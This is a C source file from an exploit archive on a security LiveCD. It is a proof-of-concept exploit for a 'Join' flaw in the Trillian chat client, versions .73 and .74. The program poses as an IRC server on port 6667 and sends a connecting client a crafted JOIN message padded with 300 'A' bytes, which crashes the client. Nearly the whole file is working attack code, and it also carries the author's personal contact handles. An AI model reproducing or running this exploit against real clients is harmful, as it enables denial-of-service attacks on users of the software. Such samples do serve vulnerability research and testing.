home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / im / trillian / Trillian-Join.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  87 lines

  1. /* Trillian-Join.c
  2.    Author: Lance Fitz-Herbert
  3.    Contact: IRC: Phrizer, DALnet - #KORP
  4.             ICQ: 23549284
  5.  
  6.    Exploits the Trillian Join Flaw.
  7.    Tested On Version .74 and .73
  8.    Compiles with Borland 5.5 Commandline Tools.
  9.  
  10.    This Example Will Just DoS The Trillian Client,
  11.    not particularly useful, just proves the flaw exists.
  12.  
  13. */
  14.  
  15. #include <windows.h>
  16. #include <stdio.h>
  17. #include <stdlib.h>
  18. #include <winsock.h>
  19.  
  20. SOCKET s;
  21.  
  22. #define MSG1 ":server 001 target :target\n:target!ident@address JOIN :"
  23.  
  24. int main() {
  25.  
  26.         SOCKET TempSock = SOCKET_ERROR;
  27.         WSADATA WsaDat;
  28.         SOCKADDR_IN Sockaddr;
  29.         int nRet;
  30.         char payload[300];
  31.  
  32.         printf("\nTrillian Join Flaw\n");
  33.         printf("----------------------\n");
  34.         printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
  35.         printf("Tested On Version .74 and .73\nListening On Port 6667 For
  36. Connections\n\n");
  37.  
  38.         if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
  39.                 printf("ERROR: WSA Initialization failed.");
  40.                 return 0;
  41.         }
  42.  
  43.  
  44.         /* Create Socket */
  45.         s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  46.         if (s == INVALID_SOCKET) {
  47.                 printf("ERROR: Could Not Create Socket. Exiting\n");
  48.                 WSACleanup();
  49.                 return 0;
  50.         }
  51.  
  52.         Sockaddr.sin_port = htons(6667);
  53.         Sockaddr.sin_family = AF_INET;
  54.         Sockaddr.sin_addr.s_addr  = INADDR_ANY;
  55.  
  56.  
  57.         nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
  58.         if (nRet == SOCKET_ERROR) {
  59.                 printf("ERROR Binding Socket");
  60.                 WSACleanup();
  61.                 return 0;
  62.         }
  63.  
  64.         /* Make Socket Listen */
  65.         if (listen(s, 10) == SOCKET_ERROR) {
  66.                 printf("ERROR: Couldnt Make Listening Socket\n");
  67.                 WSACleanup();
  68.                 return 0;
  69.         }
  70.  
  71.         while (TempSock == SOCKET_ERROR) {
  72.               TempSock = accept(s, NULL, NULL);
  73.         }
  74.  
  75.         printf("Client Connected, Sending Payload\n");
  76.  
  77.         send(TempSock,MSG1,strlen(MSG1),0);
  78.         memset(payload,'A',300);
  79.         send(TempSock,payload,strlen(payload),0);
  80.         send(TempSock,"\n",1,0);
  81.  
  82.         printf("Exiting\n");
  83.         sleep(100);
  84.         WSACleanup();
  85.         return 0;
  86. }
  87.